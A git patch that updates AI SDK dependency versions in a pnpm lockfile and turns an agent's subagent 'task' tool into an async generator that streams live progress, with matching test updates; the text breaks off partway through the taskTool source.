engines: {node: '>=18'} - - '@ai-sdk/provider@2.0.2': - resolution: {integrity: sha512-Epf0oKdUxNRK97Qm4l/Sp05TnwzE8FsyRF5p6nncOp8zH0GTuwK2uZoyzE/3uVjRdZNLyQ6Jw/SBjlOScMQy1Q==} - engines: {node: '>=18'} - - '@ai-sdk/provider@3.0.0-beta.20': - resolution: {integrity: sha512-+JqXbqHHtucRsMFGidygRyftpjX1GD2r4cG3Sh2URZ6g8IaN8k4loXNh2gX92dd4YjlYYn3eTHp3R8dDJfX25Q==} - engines: {node: '>=18'} - - '@ai-sdk/provider@3.0.3': - resolution: {integrity: sha512-qGPYdoAuECaUXPrrz0BPX1SacZQuJ6zky0aakxpW89QW1hrY0eF4gcFm/3L9Pk8C5Fwe+RvBf2z7ZjDhaPjnlg==} + '@ai-sdk/provider@3.0.10': + resolution: {integrity: sha512-Q3BZ27qfpYqnCYGvE3vt+Qi6LGOF9R5Nmzn+9JoM1lCRsD9mYaIhfJLkSunN48nfGXJ6n+XNV0J/XVpqGQl7Dw==} engines: {node: '>=18'} '@alloc/quick-lru@5.2.0': @@ -3252,14 +3206,6 @@ packages: '@aws-sdk/credential-provider-web-identity': optional: true - '@vercel/oidc@3.0.5': - resolution: {integrity: sha512-fnYhv671l+eTTp48gB4zEsTW/YtRgRPnkI2nT7x6qw5rkI1Lq2hTmQIpHPgyThI0znLK+vX2n9XxKdXZ7BUbbw==} - engines: {node: '>= 20'} - - '@vercel/oidc@3.1.0': - resolution: {integrity: sha512-Fw28YZpRnA3cAHHDlkt7xQHiJ0fcL+NRcIqsocZQUSmbzeIKRpwttJjik5ZGanXP+vlA4SbTg+AbA3bP363l+w==} - engines: {node: '>= 20'} - '@vercel/oidc@3.2.0': resolution: {integrity: sha512-UycprH3T6n3jH0k44NHMa7pnFHGu/N05MjojYr+Mc6I7obkoLIJujSWwin1pCvdy/eOxrI/l3uDLQsmcrOb4ug==} engines: {node: '>= 20'} @@ -3647,8 +3593,8 @@ packages: resolution: {integrity: sha512-kja8j7PjmncONqaTsB8fQ+wE2mSU2DJ9D4XKoJ5PFWIdRMa6SLSN1ff4mOr4jCbfRSsxR4keIiySJU0N9T5hIQ==} engines: {node: '>= 8.0.0'} - ai@6.0.0-beta.122: - resolution: {integrity: sha512-Lk8hWSX22eyJBwZvIRY+Bgl8piVB9Jadqv+ine0B2lDJWPg3lsmQac3kSAzGhPBeNeaxm22sHCs9JhuJh3gW5Q==} + ai@6.0.190: + resolution: {integrity: sha512-T+ixHbWZ6jmHRREpVVJTkFyWJeCekCdzLPan7lp1F32jG5OUw4+odlVYjtMRXVzogU+pWzpMmXdRiHUmdL/q0w==} engines: {node: '>=18'} peerDependencies: zod: ^3.25.76 || ^4.1.8 @@ -4834,6 +4780,10 @@ packages: resolution: {integrity: 
sha512-Vo1ab+QXPzZ4tCa8SwIHJFaSzy4R6SHf7BY79rFBDf0idraZWAkYrDjDj8uWaSm3S2TK+hJ7/t1CEmZ7jXw+pg==} engines: {node: '>=18.0.0'} + eventsource-parser@3.0.8: + resolution: {integrity: sha512-70QWGkr4snxr0OXLRWsFLeRBIRPuQOvt4s8QYjmUlmlkyTZkRqS7EDVRZtzU3TiyDbXSzaOeF0XUKy8PchzukQ==} + engines: {node: '>=18.0.0'} + eventsource@3.0.7: resolution: {integrity: sha512-CRT1WTyuQoD771GW56XEZFQ/ZoSfWid1alKGDYMmkt2yl8UXrVR4pspqWNEcqKvVIzg6PAltWjxcSSPrboA4iA==} engines: {node: '>=18.0.0'} @@ -8173,94 +8123,50 @@ snapshots: '@adraffy/ens-normalize@1.11.1': {} - '@ai-sdk/anthropic@3.0.13(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) - zod: 4.1.13 - - '@ai-sdk/gateway@2.0.0-beta.66(zod@4.1.13)': + '@ai-sdk/anthropic@3.0.78(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.0-beta.20 - '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13) - '@vercel/oidc': 3.0.5 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - transitivePeerDependencies: - - '@valibot/to-json-schema' - - arktype - - effect - '@ai-sdk/gateway@2.0.83(zod@4.1.13)': + '@ai-sdk/gateway@3.0.119(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 2.0.2 - '@ai-sdk/provider-utils': 3.0.24(zod@4.1.13) - '@vercel/oidc': 3.1.0 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) + '@vercel/oidc': 3.2.0 zod: 4.1.13 - '@ai-sdk/google@3.0.8(zod@4.1.13)': + '@ai-sdk/google@3.0.79(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - '@ai-sdk/mcp@0.0.12(zod@4.1.13)': + '@ai-sdk/mcp@1.0.43(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 2.0.0 - '@ai-sdk/provider-utils': 3.0.19(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) pkce-challenge: 5.0.1 zod: 4.1.13 - '@ai-sdk/openai@3.0.10(zod@4.1.13)': + '@ai-sdk/openai@3.0.65(zod@4.1.13)': 
dependencies: - '@ai-sdk/provider': 3.0.3 - '@ai-sdk/provider-utils': 4.0.6(zod@4.1.13) - zod: 4.1.13 - - '@ai-sdk/provider-utils@3.0.19(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 2.0.0 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 - zod: 4.1.13 - - '@ai-sdk/provider-utils@3.0.24(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 2.0.2 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 - zod: 4.1.13 - - '@ai-sdk/provider-utils@4.0.0-beta.38(zod@4.1.13)': - dependencies: - '@ai-sdk/provider': 3.0.0-beta.20 - '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) zod: 4.1.13 - '@ai-sdk/provider-utils@4.0.6(zod@4.1.13)': + '@ai-sdk/provider-utils@4.0.27(zod@4.1.13)': dependencies: - '@ai-sdk/provider': 3.0.3 + '@ai-sdk/provider': 3.0.10 '@standard-schema/spec': 1.1.0 - eventsource-parser: 3.0.6 + eventsource-parser: 3.0.8 zod: 4.1.13 '@ai-sdk/provider@1.1.3': dependencies: json-schema: 0.4.0 - '@ai-sdk/provider@2.0.0': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@2.0.2': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@3.0.0-beta.20': - dependencies: - json-schema: 0.4.0 - - '@ai-sdk/provider@3.0.3': + '@ai-sdk/provider@3.0.10': dependencies: json-schema: 0.4.0 @@ -8716,10 +8622,10 @@ snapshots: dependencies: zod: 4.1.13 - '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.0-beta.122(zod@4.1.13))': + '@composio/vercel@0.3.4(@composio/core@0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13))(ai@6.0.190(zod@4.1.13))': dependencies: '@composio/core': 0.3.4(ws@8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10))(zod@4.1.13) - ai: 6.0.0-beta.122(zod@4.1.13) + ai: 6.0.190(zod@4.1.13) '@crawlee/types@3.15.3': dependencies: @@ -11704,7 +11610,7 @@ snapshots: - supports-color - utf-8-validate - 
'@trigger.dev/sdk@4.4.3(ai@6.0.0-beta.122(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)': + '@trigger.dev/sdk@4.4.3(ai@6.0.190(zod@4.1.13))(bufferutil@4.0.9)(utf-8-validate@5.0.10)(zod@4.1.13)': dependencies: '@opentelemetry/api': 1.9.0 '@opentelemetry/semantic-conventions': 1.36.0 @@ -11720,7 +11626,7 @@ snapshots: ws: 8.18.3(bufferutil@4.0.9)(utf-8-validate@5.0.10) zod: 4.1.13 optionalDependencies: - ai: 6.0.0-beta.122(zod@4.1.13) + ai: 6.0.190(zod@4.1.13) transitivePeerDependencies: - bufferutil - supports-color @@ -11989,17 +11895,13 @@ snapshots: optionalDependencies: '@aws-sdk/credential-provider-web-identity': 3.972.13 - '@vercel/oidc@3.0.5': {} - - '@vercel/oidc@3.1.0': {} - '@vercel/oidc@3.2.0': {} '@vercel/oidc@3.4.0': {} '@vercel/queue@0.1.4': dependencies: - '@vercel/oidc': 3.2.0 + '@vercel/oidc': 3.4.0 minimatch: 10.2.5 mixpart: 0.0.5 picocolors: 1.1.1 @@ -13093,17 +12995,13 @@ snapshots: dependencies: humanize-ms: 1.2.1 - ai@6.0.0-beta.122(zod@4.1.13): + ai@6.0.190(zod@4.1.13): dependencies: - '@ai-sdk/gateway': 2.0.0-beta.66(zod@4.1.13) - '@ai-sdk/provider': 3.0.0-beta.20 - '@ai-sdk/provider-utils': 4.0.0-beta.38(zod@4.1.13) + '@ai-sdk/gateway': 3.0.119(zod@4.1.13) + '@ai-sdk/provider': 3.0.10 + '@ai-sdk/provider-utils': 4.0.27(zod@4.1.13) '@opentelemetry/api': 1.9.0 zod: 4.1.13 - transitivePeerDependencies: - - '@valibot/to-json-schema' - - arktype - - effect ajv-formats@3.0.1(ajv@8.17.1): optionalDependencies: @@ -14589,6 +14487,8 @@ snapshots: eventsource-parser@3.0.6: {} + eventsource-parser@3.0.8: {} + eventsource@3.0.7: dependencies: eventsource-parser: 3.0.6 From 386c4ee232107b75665e24377aad108b674e440a Mon Sep 17 00:00:00 2001 From: "sweetman.eth" Date: Thu, 21 May 2026 19:20:20 -0500 Subject: [PATCH 08/10] feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Convert taskTool.execute from `async () =>` to 
`async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. 
Co-authored-by: Claude Opus 4.7 (1M context) --- .../__tests__/sumLanguageModelUsage.test.ts | 27 ++ .../messageMetadata/sumLanguageModelUsage.ts | 21 ++ .../__tests__/askUserQuestionTool.test.ts | 14 +- lib/agent/tools/__tests__/taskTool.test.ts | 273 ++++++++++++------ lib/agent/tools/askUserQuestionTool.ts | 2 +- lib/agent/tools/taskTool.ts | 155 ++++++---- 6 files changed, 343 insertions(+), 149 deletions(-) create mode 100644 lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts create mode 100644 lib/agent/messageMetadata/sumLanguageModelUsage.ts diff --git a/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts new file mode 100644 index 000000000..403bbe5ab --- /dev/null +++ b/lib/agent/messageMetadata/__tests__/sumLanguageModelUsage.test.ts @@ -0,0 +1,27 @@ +import { describe, it, expect } from "vitest"; +import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage"; + +describe("sumLanguageModelUsage", () => { + it("returns undefined when both inputs are undefined", () => { + expect(sumLanguageModelUsage(undefined, undefined)).toBeUndefined(); + }); + + it("returns the second input when first is undefined", () => { + const u = { inputTokens: 100, outputTokens: 50 }; + expect(sumLanguageModelUsage(undefined, u as never)).toBe(u); + }); + + it("returns the first input when second is undefined", () => { + const u = { inputTokens: 100, outputTokens: 50 }; + expect(sumLanguageModelUsage(u as never, undefined)).toBe(u); + }); + + it("sums the two inputs pointwise when both are present", () => { + const result = sumLanguageModelUsage( + { inputTokens: 100, outputTokens: 50 } as never, + { inputTokens: 200, outputTokens: 75 } as never, + ); + expect(result?.inputTokens).toBe(300); + expect(result?.outputTokens).toBe(125); + }); +}); diff --git a/lib/agent/messageMetadata/sumLanguageModelUsage.ts 
b/lib/agent/messageMetadata/sumLanguageModelUsage.ts new file mode 100644 index 000000000..2f400f33b --- /dev/null +++ b/lib/agent/messageMetadata/sumLanguageModelUsage.ts @@ -0,0 +1,21 @@ +import type { LanguageModelUsage } from "ai"; +import { addLanguageModelUsage } from "@/lib/agent/messageMetadata/addLanguageModelUsage"; + +/** + * Sum two optional `LanguageModelUsage` records. Returns the sum when + * both are defined, the defined one when only one is, or `undefined` + * when neither is. Mirrors open-agents' `sumLanguageModelUsage` in + * `packages/agent/usage.ts`. + * + * Used by the `task` tool's progress streaming to accumulate usage + * across subagent steps without introducing zero-tokens placeholders + * before the first step finishes. + */ +export function sumLanguageModelUsage( + a: LanguageModelUsage | undefined, + b: LanguageModelUsage | undefined, +): LanguageModelUsage | undefined { + if (!a) return b; + if (!b) return a; + return addLanguageModelUsage(a, b); +} diff --git a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts index ee55e6305..79995551a 100644 --- a/lib/agent/tools/__tests__/askUserQuestionTool.test.ts +++ b/lib/agent/tools/__tests__/askUserQuestionTool.test.ts @@ -81,14 +81,16 @@ describe("askUserQuestionTool — server-side wiring", () => { describe("askUserQuestionTool.toModelOutput", () => { it("returns a generic message when no output is present", () => { - expect(askUserQuestionTool.toModelOutput!(undefined as never)).toEqual({ + expect(askUserQuestionTool.toModelOutput!({ output: undefined } as never)).toEqual({ type: "text", value: "User did not respond to questions.", }); }); it("formats `declined: true` as a clear decline message", () => { - const result = askUserQuestionTool.toModelOutput!({ declined: true } as never); + const result = askUserQuestionTool.toModelOutput!({ + output: { declined: true }, + } as never); expect(result).toMatchObject({ type: "text", 
value: expect.stringMatching(/declined to answer/i), @@ -97,9 +99,11 @@ describe("askUserQuestionTool.toModelOutput", () => { it("formats answered questions as a parseable Q=A summary", () => { const result = askUserQuestionTool.toModelOutput!({ - answers: { - "Which model do you want?": "Haiku", - "Which features?": ["Streaming", "Tools"], + output: { + answers: { + "Which model do you want?": "Haiku", + "Which features?": ["Streaming", "Tools"], + }, }, } as never); expect(result).toMatchObject({ diff --git a/lib/agent/tools/__tests__/taskTool.test.ts b/lib/agent/tools/__tests__/taskTool.test.ts index 609037918..8e876afdb 100644 --- a/lib/agent/tools/__tests__/taskTool.test.ts +++ b/lib/agent/tools/__tests__/taskTool.test.ts @@ -1,5 +1,5 @@ import { describe, it, expect, vi, beforeEach } from "vitest"; -import { taskTool } from "@/lib/agent/tools/taskTool"; +import { taskTool, type TaskToolOutput } from "@/lib/agent/tools/taskTool"; import { streamText } from "ai"; import { connectVercel } from "@/lib/sandbox/vercel/connect/connectVercel"; @@ -12,79 +12,176 @@ vi.mock("@/lib/sandbox/vercel/connect/connectVercel", () => ({ connectVercel: vi.fn(), })); -// `model` is normally attached by `runAgentStep` before the subagent -// sees the context. The opaque sentinel below is enough for taskTool -// to pass it into `streamText` — we assert the same instance flows -// through. 
-const mainModel = { __sentinel: "main-model" } as never; -const subagentModelOverride = { __sentinel: "subagent-model" } as never; +const mainModel = { modelId: "anthropic/claude-haiku-4.5" } as never; +const subagentModelOverride = { modelId: "anthropic/claude-sonnet-4.6" } as never; const ctx = { sandbox: { state: { sandboxName: "x" }, workingDirectory: "/sandbox/mono" }, model: mainModel, }; -function makeStreamTextResult(finalText: string) { +function makeStreamResult(opts: { + toolCalls?: Array<{ toolName: string; input: unknown }>; + finishSteps?: number; + responseMessages?: Array<{ role: string; content: unknown }>; + totalUsage?: unknown; +}) { + const calls = opts.toolCalls ?? []; + const finishCount = opts.finishSteps ?? 1; return { fullStream: (async function* () { - // empty — execute only awaits `result.finishReason` + result.response + for (const c of calls) { + yield { type: "tool-call", toolName: c.toolName, input: c.input }; + } + for (let i = 0; i < finishCount; i++) { + yield { + type: "finish-step", + usage: { inputTokens: 100, outputTokens: 25, totalTokens: 125 }, + }; + } })(), + response: Promise.resolve({ messages: opts.responseMessages ?? [] }), + totalUsage: Promise.resolve(opts.totalUsage ?? 
{ inputTokens: 0, outputTokens: 0 }), finishReason: Promise.resolve("stop"), - response: Promise.resolve({ - messages: [ - { - role: "assistant", - content: [{ type: "text", text: finalText }], - }, - ], - }), }; } +async function drainGenerator(gen: AsyncGenerator | AsyncIterable): Promise { + const out: T[] = []; + for await (const chunk of gen) out.push(chunk); + return out; +} + beforeEach(() => { vi.clearAllMocks(); vi.mocked(connectVercel).mockResolvedValue({ workingDirectory: "/sandbox/mono" } as never); }); -describe("taskTool.execute", () => { - it("runs a sub-streamText with the subagent system prompt + task + instructions", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("Task done.") as never); - const result = (await taskTool.execute!( - { task: "Find the largest .ts file", instructions: "Use glob and stat to find it" }, - { experimental_context: ctx } as never, - )) as { success: boolean; summary: string }; - expect(result.success).toBe(true); - expect(result.summary).toBe("Task done."); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as Record; - // system prompt contains task + instructions so the subagent knows its scope - expect(args.system).toEqual(expect.stringContaining("Find the largest .ts file")); - expect(args.system).toEqual(expect.stringContaining("Use glob and stat")); +describe("taskTool.execute (async generator)", () => { + it("yields an initial chunk with toolCallCount=0 + startedAt + modelId before the subagent does any work", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + const gen = taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator; + const first = await gen.next(); + expect(first.done).toBe(false); + expect(first.value).toMatchObject({ + toolCallCount: 0, + modelId: "anthropic/claude-haiku-4.5", + }); + expect(first.value.startedAt).toBeTypeOf("number"); + // Drain to finish. 
+ await drainGenerator(gen); }); - it("registers only the executor tool set (no recursion, no task/ask/skill/todo/fetch)", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); + it("emits a `pending` chunk with name + input on every tool-call", async () => { + vi.mocked(streamText).mockReturnValue( + makeStreamResult({ + toolCalls: [ + { toolName: "bash", input: { command: "ls" } }, + { toolName: "read", input: { path: "/foo" } }, + ], + finishSteps: 1, + responseMessages: [{ role: "assistant", content: [{ type: "text", text: "done" }] }], + }) as never, + ); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + // Two tool-call yields + one finish-step yield (sticky pending so the + // UI doesn't flicker back to an initializing state between steps). + const pendingChunks = chunks.filter(c => c.pending); + expect(pendingChunks).toHaveLength(3); + expect(pendingChunks[0]?.pending).toEqual({ name: "bash", input: { command: "ls" } }); + expect(pendingChunks[0]?.toolCallCount).toBe(1); + expect(pendingChunks[1]?.pending).toEqual({ name: "read", input: { path: "/foo" } }); + expect(pendingChunks[1]?.toolCallCount).toBe(2); + // Finish-step keeps the most recent pending sticky. 
+ expect(pendingChunks[2]?.pending).toEqual({ name: "read", input: { path: "/foo" } }); + }); + + it("accumulates usage across finish-step parts", async () => { + vi.mocked(streamText).mockReturnValue( + makeStreamResult({ + finishSteps: 2, + responseMessages: [{ role: "assistant", content: [{ type: "text", text: "ok" }] }], + }) as never, + ); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + const usageChunks = chunks.filter(c => c.usage); + // 2 finish-step yields + 1 final yield = 3 chunks carrying usage + expect(usageChunks.length).toBeGreaterThanOrEqual(2); + const last = usageChunks[usageChunks.length - 1]!; + expect(last.usage).toMatchObject({ inputTokens: 200, outputTokens: 50 }); + }); + + it("emits a final chunk containing the subagent's full response.messages transcript", async () => { + const responseMessages = [ + { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }, + { role: "tool", content: [{ type: "tool-result", output: "..." }] }, + { role: "assistant", content: [{ type: "text", text: "Done." 
}] }, + ]; + vi.mocked(streamText).mockReturnValue(makeStreamResult({ responseMessages }) as never); + const chunks = (await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + )) as TaskToolOutput[]; + const finalChunk = chunks.find(c => c.final); + expect(finalChunk).toBeDefined(); + expect(finalChunk!.final).toEqual(responseMessages); + expect(finalChunk!.toolCallCount).toBe(0); + expect(finalChunk!.usage).toBeDefined(); + }); + + it("uses the subagentModel override when set on the agent context", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + } as never) as AsyncGenerator, + ); + const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; + expect(args.model).toBe(subagentModelOverride); + }); + + it("throws when agent context is missing the `model` field", async () => { + const gen = taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: { sandbox: ctx.sandbox /* no model */ }, + } as never) as AsyncGenerator; + await expect(gen.next()).rejects.toThrow(/model not initialized/i); + }); + + it("registers only the executor tool set on the inner streamText call", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + ); const args = vi.mocked(streamText).mock.calls[0]?.[0] as { tools: Record }; - const toolNames = Object.keys(args.tools).sort(); - expect(toolNames).toEqual(["bash", "edit", "glob", "grep", "read", "write"]); - // Critical: NO task (recursion guard) and NO client-side tools. 
- expect(args.tools).not.toHaveProperty("task"); - expect(args.tools).not.toHaveProperty("ask_user_question"); - expect(args.tools).not.toHaveProperty("skill"); - expect(args.tools).not.toHaveProperty("todo_write"); - expect(args.tools).not.toHaveProperty("web_fetch"); + expect(Object.keys(args.tools).sort()).toEqual([ + "bash", + "edit", + "glob", + "grep", + "read", + "write", + ]); }); - it("passes a non-empty prompt so the model has something to act on", async () => { - // Regression: a previous version called streamText with `messages: []`, - // which caused the AI SDK to throw NoOutputGeneratedError because zero - // steps were recorded — the model had a system prompt but no user turn - // to respond to. The subagent must receive an explicit user-side trigger. - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); + it("passes a non-empty prompt so the model has something to act on (NoOutputGeneratedError regression)", async () => { + vi.mocked(streamText).mockReturnValue(makeStreamResult({}) as never); + await drainGenerator( + taskTool.execute!({ task: "x", instructions: "y" }, { + experimental_context: ctx, + } as never) as AsyncGenerator, + ); const args = vi.mocked(streamText).mock.calls[0]?.[0] as { prompt?: string; messages?: unknown[]; @@ -93,54 +190,46 @@ describe("taskTool.execute", () => { const hasMessages = Array.isArray(args.messages) && args.messages.length > 0; expect(hasPrompt || hasMessages).toBe(true); }); +}); - it("inherits the parent's `model` from agent context when no subagentModel override is set", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; - 
expect(args.model).toBe(mainModel); +describe("taskTool.toModelOutput", () => { + it("returns 'Task completed.' when no `final` is present", () => { + const out = taskTool.toModelOutput!({ output: {} } as never); + expect(out).toEqual({ type: "text", value: "Task completed." }); }); - it("prefers `subagentModel` over `model` when both are set on the context", async () => { - vi.mocked(streamText).mockReturnValue(makeStreamTextResult("done") as never); - await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: { ...ctx, subagentModel: subagentModelOverride }, + it("extracts the last assistant text part from the transcript", () => { + const out = taskTool.toModelOutput!({ + output: { + final: [ + { role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }, + { role: "tool", content: [{ type: "tool-result" }] }, + { + role: "assistant", + content: [ + { type: "tool-call", toolName: "read" }, + { type: "text", text: "Found 3 files." }, + ], + }, + ], + }, } as never); - const args = vi.mocked(streamText).mock.calls[0]?.[0] as { model: unknown }; - expect(args.model).toBe(subagentModelOverride); + expect(out).toEqual({ type: "text", value: "Found 3 files." 
}); }); - it("returns success:false when no assistant text is in the response", async () => { - vi.mocked(streamText).mockReturnValue({ - fullStream: (async function* () {})(), - finishReason: Promise.resolve("stop"), - response: Promise.resolve({ messages: [] }), + it("handles a string-valued content directly", () => { + const out = taskTool.toModelOutput!({ + output: { final: [{ role: "assistant", content: "plain text reply" }] }, } as never); - const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never)) as { success: boolean; summary: string }; - expect(result.success).toBe(false); - expect(result.summary).toMatch(/no.*assistant/i); - }); - - it("returns success:false with a descriptive error when streamText throws", async () => { - vi.mocked(streamText).mockImplementation(() => { - throw new Error("gateway down"); - }); - const result = (await taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: ctx, - } as never)) as { success: boolean; error: string }; - expect(result.success).toBe(false); - expect(result.error).toMatch(/gateway down/); + expect(out).toEqual({ type: "text", value: "plain text reply" }); }); - it("throws when agent context is missing the `model` field", async () => { - await expect( - taskTool.execute!({ task: "x", instructions: "y" }, { - experimental_context: { sandbox: ctx.sandbox /* no model */ }, - } as never), - ).rejects.toThrow(/model not initialized/i); + it("falls back to 'Task completed.' when the last assistant message has no text parts", () => { + const out = taskTool.toModelOutput!({ + output: { + final: [{ role: "assistant", content: [{ type: "tool-call", toolName: "bash" }] }], + }, + } as never); + expect(out).toEqual({ type: "text", value: "Task completed." 
}); }); }); diff --git a/lib/agent/tools/askUserQuestionTool.ts b/lib/agent/tools/askUserQuestionTool.ts index 8d5e1f4ed..1e15b27f4 100644 --- a/lib/agent/tools/askUserQuestionTool.ts +++ b/lib/agent/tools/askUserQuestionTool.ts @@ -57,7 +57,7 @@ Usage notes: outputSchema: askUserQuestionOutputSchema, // NO execute: this is a client-side tool. streamText halts the run after // emitting the tool-call; the chat UI fulfills it asynchronously. - toModelOutput: output => { + toModelOutput: ({ output }) => { if (!output) { return { type: "text", value: "User did not respond to questions." }; } diff --git a/lib/agent/tools/taskTool.ts b/lib/agent/tools/taskTool.ts index 83381d58f..270974fce 100644 --- a/lib/agent/tools/taskTool.ts +++ b/lib/agent/tools/taskTool.ts @@ -1,7 +1,8 @@ -import { streamText, stepCountIs, tool } from "ai"; +import { streamText, stepCountIs, tool, type LanguageModelUsage, type ModelMessage } from "ai"; import { z } from "zod"; import { buildSubagentTools } from "@/lib/agent/tools/buildSubagentTools"; import { getSubagentModel } from "@/lib/agent/tools/getSubagentModel"; +import { sumLanguageModelUsage } from "@/lib/agent/messageMetadata/sumLanguageModelUsage"; const SUBAGENT_STEP_LIMIT = 30; @@ -20,6 +21,32 @@ const taskInputSchema = z.object({ ), }); +const taskPendingToolCallSchema = z.object({ + name: z.string(), + input: z.unknown(), +}); + +export type TaskPendingToolCall = z.infer; + +/** + * Output schema mirrors open-agents' `taskOutputSchema` + * (`packages/agent/tools/task.ts`) so the chat UI can render the same + * live progress card and expandable subagent transcript when cut over + * to api's `/api/chat/workflow`. The `execute` is an async generator + * that yields multiple chunks during the subagent run; the AI SDK + * pipes each yield through `tool-output-available`. 
+ */ +const taskOutputSchema = z.object({ + pending: taskPendingToolCallSchema.optional(), + toolCallCount: z.number().int().nonnegative().optional(), + startedAt: z.number().int().nonnegative().optional(), + modelId: z.string().optional(), + final: z.custom().optional(), + usage: z.custom().optional(), +}); + +export type TaskToolOutput = z.infer; + const SUBAGENT_SYSTEM_PROMPT = `You are a focused subagent invoked by a parent agent. Run autonomously — do not ask the user clarifying questions. Complete the delegated task using the tools you have, then return a concise summary of what you did. Constraints: @@ -35,9 +62,11 @@ Constraints: * concise summary that the parent can incorporate. * * Slim port of open-agents' multi-type SUBAGENT_REGISTRY → single - * generic subagent. Streaming progress isn't piped to the UI (the - * parent sees one long-running tool call until completion); add an - * async-generator execute later if live progress matters. + * generic subagent, but the live-progress streaming pattern is a + * faithful port: the execute is `async function*`, yielding + * `{pending, toolCallCount, usage, modelId, startedAt}` chunks + * throughout the subagent run and a final `{final: ModelMessage[], …}` + * chunk carrying the full subagent transcript for UI rendering. */ export const taskTool = tool({ description: `Launch a subagent to handle complex tasks autonomously. @@ -66,57 +95,81 @@ IMPORTANT: - Include critical context (APIs, function names, file paths) in the instructions - The parent agent does not see the subagent's internal tool calls, only its final summary`, inputSchema: taskInputSchema, - execute: async ({ task, instructions }, { experimental_context, abortSignal }) => { - // Resolves to 